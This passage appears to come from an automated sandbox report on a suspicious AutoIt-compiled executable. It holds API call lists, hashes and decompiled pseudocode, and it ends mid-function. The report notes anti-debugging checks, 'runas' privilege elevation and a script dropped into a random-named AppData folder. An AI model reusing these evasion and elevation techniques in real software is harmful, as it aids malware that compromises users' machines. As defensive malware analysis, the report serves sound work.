              0x00f99a16
              0x00f99a22
              0x00f99a23
              0x00f99a28
              0x00f99a28
              0x00000000
              0x00f999e1
              0x00f999e1
              0x00f999e5
              0x00000000
              0x00f999f0
              0x00f999f6
              0x00f9a8c1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00f999fc
              0x00f999fc
              0x00f999ff
              0x00f99a02
              0x00f99a03
              0x00000000
              0x00f99a05
              0x00f99a05
              0x00000000
              0x00f99a05
              0x00f99a03
              0x00f9a8c5
              0x00f9a8c5
              0x00f9a8c8
              0x00f9a8cc
              0x00f9a8cc
              0x00f999d0
              0x00000000
              0x00f999c2

              APIs
              • _wcslen.LIBCMT ref: 00F99911
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • _memmove.LIBCMT ref: 00F9995C
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00F999A3
              • _memmove.LIBCMT ref: 00F99FE6
              • _memmove.LIBCMT ref: 00F9A914
              • _memmove.LIBCMT ref: 00FB9769
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
              • String ID:
              • API String ID: 2383988440-0
              • Opcode ID: 242e6316edc54bfd9c6cdd53c39c7f159333681ed15906d756e87318ead5801c
              • Instruction ID: 0ed6825c3d21186434c0a8996f64155ea18f43f2f01201b8211779fcb0e59b65
              • Opcode Fuzzy Hash: 242e6316edc54bfd9c6cdd53c39c7f159333681ed15906d756e87318ead5801c
              • Instruction Fuzzy Hash: AE139CB5A08200CFDB24DF29C881B6AB7E1BF89310F25895DE4868B351D775EC45EF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F935F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00F91D10: _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00F91D10: _memmove.LIBCMT ref: 00F91D57
              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00F93681
              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F93697
              • __wsplitpath.LIBCMT ref: 00F936C2
                • Part of subcall function 00FA392E: __wsplitpath_helper.LIBCMT ref: 00FA3970
              • _wcscpy.LIBCMT ref: 00F936D7
              • _wcscat.LIBCMT ref: 00F936EC
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00F936FC
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
                • Part of subcall function 00F93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00F9378C,?,?,?,00000010), ref: 00F93D38
                • Part of subcall function 00F93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00F93D71
              • _wcscpy.LIBCMT ref: 00F937D0
              • _wcslen.LIBCMT ref: 00F93853
              • _wcslen.LIBCMT ref: 00F938AD
              Strings
              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00FB817E
              • Unterminated string, xrefs: 00FB82C6
              • Error opening the file, xrefs: 00FB81AF
              • _, xrefs: 00F9394C
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
              • API String ID: 3393021363-188983378
              • Opcode ID: b7ca3bba3430f1e21f4deadf049ff693410a3400407b30b9ca88e2993987ad1b
              • Instruction ID: 7b012d4fd5a81974284a406e5d7abb045cf22a1017572539fb851b796c83c074
              • Opcode Fuzzy Hash: b7ca3bba3430f1e21f4deadf049ff693410a3400407b30b9ca88e2993987ad1b
              • Instruction Fuzzy Hash: 6CD1B0B2908341AAEB10EF64C841BEFB7E8AF85354F04482DF5C553141DB79DA49EBA3
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON
              Download Yara Rule
              APIs
              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00F9D7BA
                • Part of subcall function 00F92190: __wcsicoll.LIBCMT ref: 00F92262
                • Part of subcall function 00F92190: __wcsicoll.LIBCMT ref: 00F92278
                • Part of subcall function 00F92190: __wcsicoll.LIBCMT ref: 00F9228E
                • Part of subcall function 00F92190: __wcsicoll.LIBCMT ref: 00F922A4
                • Part of subcall function 00F92190: _wcscpy.LIBCMT ref: 00F922C4
              • IsDebuggerPresent.KERNEL32 ref: 00F9D7C6
              • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije,00000104,?,01037F50,01037F54), ref: 00F9D82D
                • Part of subcall function 00F916A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F916E5
              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00F9D8A2
              • MessageBoxA.USER32 ref: 00FBE14F
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FBE1A3
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FBE1D3
              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00FBE21D
              • ShellExecuteW.SHELL32(00000000), ref: 00FBE224
                • Part of subcall function 00FA03E0: GetSysColorBrush.USER32(0000000F), ref: 00FA03EB
                • Part of subcall function 00FA03E0: LoadCursorW.USER32(00000000,00007F00), ref: 00FA03FA
                • Part of subcall function 00FA03E0: LoadIconW.USER32(?,00000063), ref: 00FA0410
                • Part of subcall function 00FA03E0: LoadIconW.USER32(?,000000A4), ref: 00FA0423
                • Part of subcall function 00FA03E0: LoadIconW.USER32(?,000000A2), ref: 00FA0436
                • Part of subcall function 00FA03E0: LoadImageW.USER32 ref: 00FA045E
                • Part of subcall function 00FA03E0: RegisterClassExW.USER32 ref: 00FA04AD
                • Part of subcall function 00FA0350: CreateWindowExW.USER32 ref: 00FA0385
                • Part of subcall function 00FA0350: CreateWindowExW.USER32 ref: 00FA03AE
                • Part of subcall function 00FA0350: ShowWindow.USER32(?,00000000), ref: 00FA03C4
                • Part of subcall function 00FA0350: ShowWindow.USER32(?,00000000), ref: 00FA03CE
                • Part of subcall function 00F9E2C0: _memset.LIBCMT ref: 00F9E2E2
                • Part of subcall function 00F9E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F9E3A7
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__memset_wcscpy
              • String ID: AutoIt$C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
              • API String ID: 765478012-696521227
              • Opcode ID: 1097b7976afcf6bbcb06eb8f9defc43701e59eac9120cd2f332e9f36eb04c263
              • Instruction ID: 805c40fdd6a4884115ecf270fc68321ef55ac6a7673b8de4b1bbfd35cbb458b7
              • Opcode Fuzzy Hash: 1097b7976afcf6bbcb06eb8f9defc43701e59eac9120cd2f332e9f36eb04c263
              • Instruction Fuzzy Hash: 87415D71E00244AFEF20EBA5DC45BE9777CBB48724F204189F6C557286CB7D4988DB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9EE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNELBASE(uxtheme.dll,00F9EE15,00F9D92E), ref: 00F9EE3B
              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00F9EE4D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: IsThemeActive$uxtheme.dll
              • API String ID: 2574300362-3542929980
              • Opcode ID: 7d52f593ae1091348f21ac697944d4c7562c0b5aef290f938f5438461ff3f5a5
              • Instruction ID: f723efb3b46bb11eb3735be3b7ae9470bde48431fe2b77a319080d74252dd965
              • Opcode Fuzzy Hash: 7d52f593ae1091348f21ac697944d4c7562c0b5aef290f938f5438461ff3f5a5
              • Instruction Fuzzy Hash: BFD0C9B4D00703DAEF305F22C41960277E4AB00B55F21882CA5D1D5118DB7DC480DB24
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(?,00000000), ref: 00FC39AC
              • FindFirstFileW.KERNELBASE(?,?), ref: 00FC39BD
              • FindClose.KERNEL32(00000000), ref: 00FC39D0
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$AttributesCloseFirst
              • String ID:
              • API String ID: 48322524-0
              • Opcode ID: 5df8a9bcad485907f641f1fff732a05cadfd99ededa7d4bf14ce8dfb29fd55bc
              • Instruction ID: fb20d77916fd5563bdbdb9044d55350c7c7919da53866af1bd186c69a40a6851
              • Opcode Fuzzy Hash: 5df8a9bcad485907f641f1fff732a05cadfd99ededa7d4bf14ce8dfb29fd55bc
              • Instruction Fuzzy Hash: 1FE0D8368145189B8620EABCFC0D8E9779DDF06335F104746FE78C25C0D7799A9057D6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
              Download Yara Rule
              C-Code - Quality: 57%
              			E00F93C50(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E00FB2160(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E00FA333F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E00FA333F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E00FA333F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E00FA333F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E00FA333F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E00FA333F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E00FA333F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													_t51 = E00FFFD26(__eflags, _a16, _t120); // executed
													__eflags = _t51;
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E00FD4AA0(_t98, __eflags, _t120);
													E00FD4A44(_t98, _t120);
													_t58 = E00FA333F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E00FA333F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E00FA333F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E00FA333F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E00FE3F89(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E00FA333F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E00FD4AE1();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E00FE3F89(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E00F9F290(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E00F935F0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E00FA13CB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E00F9F260(_t120 + 0x2c, __eflags);
								E00FD4A44(_t98, _t122);
								E00FD4AA0(_t98, __eflags, _t122);
								_t86 = E00FA10E1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E00FD4A44(0, _t119);
									E00FD4AA0(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E00FA10FC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}









































              0x00f93c50
              0x00f93c50
              0x00f93c58
              0x00f93c5f
              0x00f93c67
              0x00fb8390
              0x00fb8392
              0x00fb8397
              0x00fb839a
              0x00fb839c
              0x00fb83b3
              0x00fb83b8
              0x00fb83bb
              0x00fb83bd
              0x00fb83d5
              0x00fb83da
              0x00fb83dd
              0x00fb83df
              0x00fb83f7
              0x00fb83fc
              0x00fb83ff
              0x00fb8401
              0x00fb846b
              0x00fb8470
              0x00fb8473
              0x00fb8475
              0x00fb84cb
              0x00fb84d0
              0x00fb84d3
              0x00fb84d5
              0x00fb853b
              0x00fb8540
              0x00fb8543
              0x00fb8545
              0x00fb855f
              0x00fb855f
              0x00fb8562
              0x00fb8569
              0x00fb856e
              0x00fb8573
              0x00fb8575
              0x00000000
              0x00000000
              0x00fb8577
              0x00fb857a
              0x00fb8580
              0x00fb858d
              0x00fb8592
              0x00fb8595
              0x00fb8597
              0x00fb85ea
              0x00fb85ea
              0x00000000
              0x00fb85ea
              0x00fb85a1
              0x00fb85a6
              0x00fb85a9
              0x00fb85ab
              0x00000000
              0x00000000
              0x00fb85b5
              0x00fb85ba
              0x00fb85bd
              0x00fb85bf
              0x00fb85d5
              0x00fb85d8
              0x00fb85d9
              0x00fb85dc
              0x00fb85de
              0x00000000
              0x00000000
              0x00000000
              0x00fb85e0
              0x00fb85c9
              0x00fb85ce
              0x00fb85d1
              0x00fb85d3
              0x00000000
              0x00000000
              0x00000000
              0x00fb85d3
              0x00fb85f2
              0x00fb85f6
              0x00fb83a1
              0x00000000
              0x00fb83a1
              0x00fb860a
              0x00000000
              0x00fb860f
              0x00fb854f
              0x00fb8554
              0x00fb8557
              0x00fb8559
              0x00000000
              0x00000000
              0x00000000
              0x00fb8559
              0x00fb84dd
              0x00fb84e1
              0x00fb84e2
              0x00fb84e3
              0x00fb84eb
              0x00fb84ee
              0x00fb84f0
              0x00fb84f2
              0x00fb8527
              0x00000000
              0x00fb852c
              0x00fb84f4
              0x00fb84f5
              0x00fb84f6
              0x00fb8502
              0x00fb8509
              0x00fb850a
              0x00fb850b
              0x00fb8512
              0x00000000
              0x00fb8517
              0x00fb8477
              0x00fb847a
              0x00000000
              0x00000000
              0x00fb8480
              0x00fb8480
              0x00fb8482
              0x00fb848f
              0x00fb8494
              0x00fb8497
              0x00fb8499
              0x00000000
              0x00000000
              0x00fb849b
              0x00fb849c
              0x00fb849f
              0x00000000
              0x00000000
              0x00000000
              0x00fb84a1
              0x00fb84b3
              0x00000000
              0x00fb84bd
              0x00fb840b
              0x00fb840e
              0x00fb8414
              0x00fb841a
              0x00fb8422
              0x00fb8428
              0x00fb8443
              0x00fb842a
              0x00fb842c
              0x00fb842c
              0x00fb8430
              0x00fb8435
              0x00fb843b
              0x00fb8440
              0x00fb8440
              0x00fb844e
              0x00fb8450
              0x00fb8451
              0x00000000
              0x00fb8459
              0x00fb83e1
              0x00000000
              0x00fb83e5
              0x00fb83bf
              0x00000000
              0x00fb83c3
              0x00fb839e
              0x00000000
              0x00fb839e
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __wcsnicmp
              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
              • API String ID: 1038674560-3360698832
              • Opcode ID: 1ddaaad37e99926f2dbf3b3f6fd9776900b53fee878cf0f5e9c9c1a4f2d15505
              • Instruction ID: 226b6d7117bbeadf3beca2d5958e2d707a75aeb1838e02d4c6dfa79f1cb03a63
              • Opcode Fuzzy Hash: 1ddaaad37e99926f2dbf3b3f6fd9776900b53fee878cf0f5e9c9c1a4f2d15505
              • Instruction Fuzzy Hash: 4561EB71A4471567EB20AA21DC42FDF339D9F52750F044015FC06AE146EF79EA42FAA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F99430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00F99430(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0x10274e2 = 0;
					E00FEE724(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E00F9FFF0(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E00F9FF70(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E00F91C50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0x1027518); // executed
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0x10274e3 != 0) {
							L10:
							if( *0x1038624 != 0) {
								_t297 =  *0x1038628; // 0x0
								_t460 =  *_t297;
								E00FC1D6C();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E00FF4D61( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E00F9DE00( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E0100D2F8( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0x10274ec == 1) {
								__eflags =  *0x10274e3;
								if( *0x10274e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
